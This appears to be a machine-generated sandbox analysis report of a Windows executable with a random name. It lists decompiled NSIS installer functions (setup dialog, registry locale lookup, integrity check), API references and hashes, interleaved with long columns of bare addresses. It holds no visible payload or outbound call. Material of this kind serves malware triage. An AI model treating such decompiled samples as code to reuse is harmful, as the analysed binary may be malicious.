                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ca7
                                                                                                                          0x00403caa
                                                                                                                          0x00403cad
                                                                                                                          0x00403cc4
                                                                                                                          0x00403cd0
                                                                                                                          0x00403ce9
                                                                                                                          0x00403cef
                                                                                                                          0x00403cf3
                                                                                                                          0x00403cf8
                                                                                                                          0x00403cfe
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403d08
                                                                                                                          0x00403d13
                                                                                                                          0x00000000
                                                                                                                          0x00403d13
                                                                                                                          0x00403c3d
                                                                                                                          0x00403c43
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403c49
                                                                                                                          0x00403c4f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403c55
                                                                                                                          0x00403c29
                                                                                                                          0x00403d20
                                                                                                                          0x00403d2c
                                                                                                                          0x00403d33
                                                                                                                          0x00000000
                                                                                                                          0x00403a84
                                                                                                                          0x00403a84
                                                                                                                          0x00403a87
                                                                                                                          0x00403aba
                                                                                                                          0x00403aba
                                                                                                                          0x00403abc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403abc
                                                                                                                          0x00403a89
                                                                                                                          0x00403a8d
                                                                                                                          0x00403a92
                                                                                                                          0x00403a94
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403aa4
                                                                                                                          0x00403aac
                                                                                                                          0x00000000
                                                                                                                          0x00403ab2
                                                                                                                          0x004038e0
                                                                                                                          0x004038e0
                                                                                                                          0x004038e4
                                                                                                                          0x004038e9
                                                                                                                          0x004038f8
                                                                                                                          0x004038f8
                                                                                                                          0x00403901
                                                                                                                          0x0040390a
                                                                                                                          0x00403915
                                                                                                                          0x00403915
                                                                                                                          0x00403921
                                                                                                                          0x0040393d
                                                                                                                          0x00403940
                                                                                                                          0x00403953
                                                                                                                          0x00403959
                                                                                                                          0x004039fc
                                                                                                                          0x00000000
                                                                                                                          0x00403a05
                                                                                                                          0x0040395f
                                                                                                                          0x0040396c
                                                                                                                          0x0040396e
                                                                                                                          0x00403970
                                                                                                                          0x0040398f
                                                                                                                          0x0040398f
                                                                                                                          0x00403992
                                                                                                                          0x00403997
                                                                                                                          0x0040399a
                                                                                                                          0x004039aa
                                                                                                                          0x004039ab
                                                                                                                          0x004039ad
                                                                                                                          0x004039e3
                                                                                                                          0x004039f6
                                                                                                                          0x00000000
                                                                                                                          0x004039f6
                                                                                                                          0x004039af
                                                                                                                          0x004039b5
                                                                                                                          0x004039ce
                                                                                                                          0x004039d3
                                                                                                                          0x004039d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004039d7
                                                                                                                          0x004039c3
                                                                                                                          0x004039c3
                                                                                                                          0x004039c5
                                                                                                                          0x004039c5
                                                                                                                          0x00000000
                                                                                                                          0x004039c5
                                                                                                                          0x004039b8
                                                                                                                          0x004039bd
                                                                                                                          0x00000000
                                                                                                                          0x004039bd
                                                                                                                          0x0040399c
                                                                                                                          0x004039a2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004039a4
                                                                                                                          0x00000000
                                                                                                                          0x004039a4
                                                                                                                          0x00403994
                                                                                                                          0x00000000
                                                                                                                          0x00403994
                                                                                                                          0x0040397a
                                                                                                                          0x00403981
                                                                                                                          0x00403987
                                                                                                                          0x00403989
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403989
                                                                                                                          0x00403945
                                                                                                                          0x00000000
                                                                                                                          0x00403923
                                                                                                                          0x00403929
                                                                                                                          0x00403933
                                                                                                                          0x00403d39
                                                                                                                          0x00403d3f
                                                                                                                          0x00403d41
                                                                                                                          0x00403d47
                                                                                                                          0x00403d4c
                                                                                                                          0x00403d52
                                                                                                                          0x00403d52
                                                                                                                          0x00403d47
                                                                                                                          0x00403d5c
                                                                                                                          0x00000000
                                                                                                                          0x00403d5c
                                                                                                                          0x00403921

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                                                                                                          • ShowWindow.USER32(?), ref: 00403915
                                                                                                                          • DestroyWindow.USER32 ref: 00403929
                                                                                                                          • SetWindowLongA.USER32 ref: 00403945
                                                                                                                          • GetDlgItem.USER32 ref: 00403966
                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403981
                                                                                                                          • GetDlgItem.USER32 ref: 00403A2F
                                                                                                                          • GetDlgItem.USER32 ref: 00403A39
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403A53
                                                                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
                                                                                                                          • GetDlgItem.USER32 ref: 00403B4A
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403B7D
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403B98
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                                                                                                          • EnableMenuItem.USER32 ref: 00403BB5
                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
                                                                                                                          • lstrlenA.KERNEL32(00420478,?,00420478,sail Setup), ref: 00403C09
                                                                                                                          • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                                                          • String ID: sail Setup
                                                                                                                          • API String ID: 4050669955-319608084
                                                                                                                          • Opcode ID: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                                                          • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                                                                                                          • Opcode Fuzzy Hash: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                                                          • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423e90; // 0x4868b0
				_t20 = E00405CFF(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420478;
					"1033" = 0x7830;
					E004058C4(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420478, 0);
					__eflags =  *0x420478;
					if(__eflags == 0) {
						E004058C4(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420478, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E0040593B("1033",  *_t20() & 0x0000ffff);
				}
				E004037EF(_t76, _t88);
				_t24 =  *0x423e98; // 0x80
				_t85 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423f00 = _t24 & 0x00000020;
				 *0x423f1c = 0x10000;
				if(E004055B1(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004055B1(_t96, _t85) == 0) {
						E004059FF(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423e80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423668 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004037EF(_t76, __eflags);
							__eflags =  *0x423f20; // 0x0
							if(__eflags != 0) {
								_t31 = E00404E4D(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42364c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420450, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423620);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423620);
								 *0x423644 = _t86;
								RegisterClassA(0x423620);
							}
							_t39 =  *0x423660; // 0x0
							_t42 = DialogBoxParamA( *0x423e80, _t39 + 0x00000069 & 0x0000ffff, 0, E004038BC, 0); // executed
							E00403476(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423e80; // 0x400000
						 *0x423634 = _t28;
						_v20 = 0x624e5f;
						 *0x423624 = E00401000;
						 *0x423630 = _t76;
						 *0x423644 =  &_v20;
						if(RegisterClassA(0x423620) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420450 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423e80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423eb8; // 0x48a39c
					_t79 = 0x422e20;
					E004058C4( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422e20, 0);
					_t62 =  *0x422e20; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e21;
						 *((char*)(E004054FB(0x422e21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E004059DD(_t85, E004054D0(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405517(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                                                                                          0x0040352c
                                                                                                                          0x00403535
                                                                                                                          0x0040353c
                                                                                                                          0x0040353e
                                                                                                                          0x00403552
                                                                                                                          0x00403564
                                                                                                                          0x0040356e
                                                                                                                          0x00403573
                                                                                                                          0x00403579
                                                                                                                          0x0040358c
                                                                                                                          0x0040358c
                                                                                                                          0x00403597
                                                                                                                          0x00403540
                                                                                                                          0x0040354b
                                                                                                                          0x0040354b
                                                                                                                          0x0040359c
                                                                                                                          0x004035a1
                                                                                                                          0x004035a6
                                                                                                                          0x004035af
                                                                                                                          0x004035b4
                                                                                                                          0x004035c5
                                                                                                                          0x0040364c
                                                                                                                          0x00403654
                                                                                                                          0x0040365d
                                                                                                                          0x0040365d
                                                                                                                          0x00403673
                                                                                                                          0x00403679
                                                                                                                          0x00403687
                                                                                                                          0x00403716
                                                                                                                          0x0040371e
                                                                                                                          0x00403728
                                                                                                                          0x0040372d
                                                                                                                          0x00403733
                                                                                                                          0x004037bd
                                                                                                                          0x004037c2
                                                                                                                          0x004037c4
                                                                                                                          0x004037e0
                                                                                                                          0x00000000
                                                                                                                          0x004037e0
                                                                                                                          0x004037c6
                                                                                                                          0x004037cc
                                                                                                                          0x004037d4
                                                                                                                          0x004037d4
                                                                                                                          0x00000000
                                                                                                                          0x004037cc
                                                                                                                          0x00403741
                                                                                                                          0x00403752
                                                                                                                          0x00403754
                                                                                                                          0x00403756
                                                                                                                          0x0040375d
                                                                                                                          0x0040375d
                                                                                                                          0x00403765
                                                                                                                          0x0040376d
                                                                                                                          0x0040376f
                                                                                                                          0x00403771
                                                                                                                          0x0040377a
                                                                                                                          0x0040377d
                                                                                                                          0x00403783
                                                                                                                          0x00403783
                                                                                                                          0x00403789
                                                                                                                          0x004037a2
                                                                                                                          0x004037b3
                                                                                                                          0x00000000
                                                                                                                          0x004037b8
                                                                                                                          0x00403720
                                                                                                                          0x00403722
                                                                                                                          0x00000000
                                                                                                                          0x0040368d
                                                                                                                          0x0040368d
                                                                                                                          0x00403693
                                                                                                                          0x0040369d
                                                                                                                          0x004036a5
                                                                                                                          0x004036af
                                                                                                                          0x004036b5
                                                                                                                          0x004036c3
                                                                                                                          0x004037e5
                                                                                                                          0x004037e5
                                                                                                                          0x00000000
                                                                                                                          0x004037e5
                                                                                                                          0x004036c9
                                                                                                                          0x004036d2
                                                                                                                          0x00403711
                                                                                                                          0x00000000
                                                                                                                          0x00403711
                                                                                                                          0x004035cb
                                                                                                                          0x004035cb
                                                                                                                          0x004035d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004035d5
                                                                                                                          0x004035da
                                                                                                                          0x004035ea
                                                                                                                          0x004035ef
                                                                                                                          0x004035f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004035fa
                                                                                                                          0x004035fc
                                                                                                                          0x00403609
                                                                                                                          0x00403609
                                                                                                                          0x00403611
                                                                                                                          0x00403617
                                                                                                                          0x0040363f
                                                                                                                          0x00403647
                                                                                                                          0x00000000
                                                                                                                          0x00403629
                                                                                                                          0x0040362a
                                                                                                                          0x00403633
                                                                                                                          0x00403639
                                                                                                                          0x0040363a
                                                                                                                          0x00000000
                                                                                                                          0x0040363a
                                                                                                                          0x00403635
                                                                                                                          0x00403637
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403637
                                                                                                                          0x00403617

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                            • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                            • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ), ref: 0040360C
                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000), ref: 0040361F
                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 0040362A
                                                                                                                          • LoadImageA.USER32 ref: 00403673
                                                                                                                            • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                          • RegisterClassA.USER32 ref: 004036BA
                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                                                                                                          • CreateWindowExA.USER32 ref: 0040370B
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                                                                                                          • LoadLibraryA.KERNELBASE(RichEd20), ref: 00403752
                                                                                                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                                                                                                          • GetClassInfoA.USER32 ref: 0040376D
                                                                                                                          • GetClassInfoA.USER32 ref: 0040377A
                                                                                                                          • RegisterClassA.USER32 ref: 00403783
                                                                                                                          • DialogBoxParamA.USER32 ref: 004037A2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: 6B$"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                          • API String ID: 914957316-737491654
                                                                                                                          • Opcode ID: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                                                                                                          • Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
                                                                                                                          • Opcode Fuzzy Hash: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                                                                                                          • Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402C22, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00402C22(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe";
				 *0x423e8c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe", 0x400);
				_t89 = E004056B4(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490";
				E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490", _t91);
				E004059DD(0x42b000, E00405517(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f028 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BBE(1);
					__eflags =  *0x423e94 - _t82; // 0x7e00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423e94; // 0x7e00
						E00403080(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E5B(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423e90 = _t94;
							 *0x423e98 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423e9c =  *0x423e9c + 1;
								__eflags =  *0x423e9c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405675(0x423ea0, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403080( *0x40b018);
					_t65 = E0040304E( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423e94; // 0x7e00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040304E(0x417028, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BBE(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423e94;
						if( *0x423e94 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BBE(0);
							}
							goto L20;
						}
						E00405675( &_v44, 0x417028, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b018; // 0x7e00
						 *0x423f20 =  *0x423f20 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423e94 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40915c
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f028;
						if(_t93 <  *0x41f028) {
							_v12 = E00405D6B(_v12, 0x417028, _t90);
						}
						 *0x40b018 =  *0x40b018 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                                                                                          0x00402c2a
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c30
                                                                                                                          0x00402c33
                                                                                                                          0x00402c39
                                                                                                                          0x00402c4a
                                                                                                                          0x00402c4f
                                                                                                                          0x00402c62
                                                                                                                          0x00402c67
                                                                                                                          0x00402c6a
                                                                                                                          0x00402c70
                                                                                                                          0x00000000
                                                                                                                          0x00402c72
                                                                                                                          0x00402c7d
                                                                                                                          0x00402c83
                                                                                                                          0x00402c94
                                                                                                                          0x00402c9b
                                                                                                                          0x00402ca1
                                                                                                                          0x00402ca3
                                                                                                                          0x00402ca8
                                                                                                                          0x00402caa
                                                                                                                          0x00402d97
                                                                                                                          0x00402d99
                                                                                                                          0x00402d9e
                                                                                                                          0x00402da5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402da7
                                                                                                                          0x00402daa
                                                                                                                          0x00402dce
                                                                                                                          0x00402dd3
                                                                                                                          0x00402dd9
                                                                                                                          0x00402ddb
                                                                                                                          0x00402de4
                                                                                                                          0x00402de9
                                                                                                                          0x00402dec
                                                                                                                          0x00402ded
                                                                                                                          0x00402dee
                                                                                                                          0x00402df0
                                                                                                                          0x00402df5
                                                                                                                          0x00402df8
                                                                                                                          0x00402e0b
                                                                                                                          0x00402e0f
                                                                                                                          0x00402e17
                                                                                                                          0x00402e1c
                                                                                                                          0x00402e1e
                                                                                                                          0x00402e1e
                                                                                                                          0x00402e1e
                                                                                                                          0x00402e26
                                                                                                                          0x00402e26
                                                                                                                          0x00402e29
                                                                                                                          0x00402e2a
                                                                                                                          0x00402e2a
                                                                                                                          0x00402e2d
                                                                                                                          0x00402e2f
                                                                                                                          0x00402e2f
                                                                                                                          0x00402e2f
                                                                                                                          0x00402e39
                                                                                                                          0x00402e3f
                                                                                                                          0x00402e4d
                                                                                                                          0x00402e52
                                                                                                                          0x00000000
                                                                                                                          0x00402e52
                                                                                                                          0x00000000
                                                                                                                          0x00402df8
                                                                                                                          0x00402db2
                                                                                                                          0x00402dbd
                                                                                                                          0x00402dc2
                                                                                                                          0x00402dc4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402dc9
                                                                                                                          0x00402dcc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402cb0
                                                                                                                          0x00402cb5
                                                                                                                          0x00402cb5
                                                                                                                          0x00402cba
                                                                                                                          0x00402cbe
                                                                                                                          0x00402cc5
                                                                                                                          0x00402cca
                                                                                                                          0x00402ccc
                                                                                                                          0x00402cce
                                                                                                                          0x00402cce
                                                                                                                          0x00402cd2
                                                                                                                          0x00402cd7
                                                                                                                          0x00402cd9
                                                                                                                          0x00402e03
                                                                                                                          0x00402dfa
                                                                                                                          0x00000000
                                                                                                                          0x00402dfa
                                                                                                                          0x00402cdf
                                                                                                                          0x00402ce6
                                                                                                                          0x00402d62
                                                                                                                          0x00402d66
                                                                                                                          0x00402d6a
                                                                                                                          0x00402d6f
                                                                                                                          0x00000000
                                                                                                                          0x00402d66
                                                                                                                          0x00402cef
                                                                                                                          0x00402cf4
                                                                                                                          0x00402cf7
                                                                                                                          0x00402cfc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402cfe
                                                                                                                          0x00402d05
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d07
                                                                                                                          0x00402d0e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d10
                                                                                                                          0x00402d17
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d19
                                                                                                                          0x00402d20
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d22
                                                                                                                          0x00402d28
                                                                                                                          0x00402d31
                                                                                                                          0x00402d37
                                                                                                                          0x00402d3a
                                                                                                                          0x00402d3c
                                                                                                                          0x00402d42
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d48
                                                                                                                          0x00402d4c
                                                                                                                          0x00402d54
                                                                                                                          0x00402d54
                                                                                                                          0x00402d57
                                                                                                                          0x00402d57
                                                                                                                          0x00402d5a
                                                                                                                          0x00402d5c
                                                                                                                          0x00402d5e
                                                                                                                          0x00402d5e
                                                                                                                          0x00000000
                                                                                                                          0x00402d5c
                                                                                                                          0x00402d4e
                                                                                                                          0x00402d52
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402d70
                                                                                                                          0x00402d70
                                                                                                                          0x00402d76
                                                                                                                          0x00402d82
                                                                                                                          0x00402d82
                                                                                                                          0x00402d85
                                                                                                                          0x00402d8b
                                                                                                                          0x00402d8d
                                                                                                                          0x00402d8d
                                                                                                                          0x00402d95
